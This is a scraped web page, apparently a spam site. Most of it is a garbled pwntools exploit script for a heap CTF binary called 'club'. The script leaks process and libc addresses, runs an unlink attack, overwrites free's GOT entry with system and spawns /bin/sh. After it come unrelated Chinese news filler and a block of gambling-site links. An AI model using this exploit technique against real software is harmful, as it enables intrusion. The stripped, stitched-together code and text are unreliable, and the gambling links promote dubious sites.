;i++){seed=i12;seed+=low3;srand(seed);if(rand()==r){printf("0x%x",rand());return0;}}printf("end");return0;}###=Truefrompwnimport*importsyscontext(arch=amd64,kernel=amd64,os=linux)#_level=debugelf=ELF(./club)ifargs[LOCAL]:libc_path=/lib/x86_64-linux-gnu/io=process(./club)("processbase:"+hex(()[/root/Desktop/test/pediy_pwn/club]))("processlibc_base:"+hex(()[libc_path]))else:libc_path=./io=remote(,8888)libc=ELF(libc_path)defcmd_new(index,size):()(1)()(str(index))()(str(size))()returndefcmd_delete(index):()(2)()(str(index))returndefcmd_edit(index,buf):()(3)()(str(index))(buf)returndefcmd_print(index):()(4)()(str(index))data=()returndatadefcmd_guess_wrong(v):()(5)()(str(v))(Thenumberis)data=(!)[:-1]returndatadefcmd_guess_right(v):()(5)()(str(v))(Yougetasecret:)data=(!)[:-1]returndatadefcmd_quit(name):()(6)()(name)()returndefexploit():#leakprocessbasev=cmd_guess_wrong(0)p_guess=process([./guess_seed,str(0x148),v])guess_r=p_()#printguess_rseed=cmd_guess_right(int(guess_r,16))#printhex(int(v))process_base=int(seed)-("leakedprocessbase:"+hex(process_base))#(io)#input()#triggercoaleace#usebox4toeditbox2box3len2=0x1A0len3=0x1F0cmd_new(2,len2)cmd_edit(2,A*len2)cmd_new(3,len3)cmd_delete(2)cmd_delete(3)cmd_new(4,len2+len3)data=cmd_print(4)[:6]libc_main_arena_top=0x3C4B78libc_base=u64((8,\x00))-libc_main_arena_topprint(leakedlibc_base:%x%libc_base)#createafakefreechunkinsidebox2beforebox3box2_ptr=process_base+0x202110print(box2_ptr:%x%box2_ptr)buf=buf+=p64(0)+p64(len2+1)+p64(box2_ptr-0x18)+p64(box2_ptr-0x10)buf+=A*(len2-0x20)buf+=p64(len2)buf+=p64(len3)cmd_edit(4,buf)cmd_delete(3)#box2_ptr-0x18writtentobox2_ptrcmd_edit(3,/bin/sh\x00)#[box2]=got_freebuf=buf+=p64(0)buf+=p64(0)#box0buf+=p64(0)#box1buf+=p64(process_base+[free])cmd_edit(2,buf)#[got_free]=systembuf=buf+=p64(libc_base+[system])cmd_edit(2,buf)#system(/bin/sh)cmd_delete(3)()returnexploit(),我有一个1024x600的小上网本,好多年了还在用。广西新闻网所刊发的新闻大量被海内外大型网络媒体转载,在省级网络媒体中名列前茅。...【阅读全文】
共5页

友情链接,当前时间:2018-8-22

捕鱼技巧 斗牛下载 现金网开户 真钱扎金花游戏 老虎机的规律 澳门现金网
博彩公司排名 网络博彩公司 www.954msc.com www.365betyazhou.pw www.kuaihuo11.com www.shenbo98.com
www.837786.com www.868506.com www.725560.com www.hg76238.com 赌博游戏 www.663239.com
杰克与吉儿电子游戏玩法 www.js72500.com www.th234.com www.vns11770.com www.2222yh.com www.56mscc.com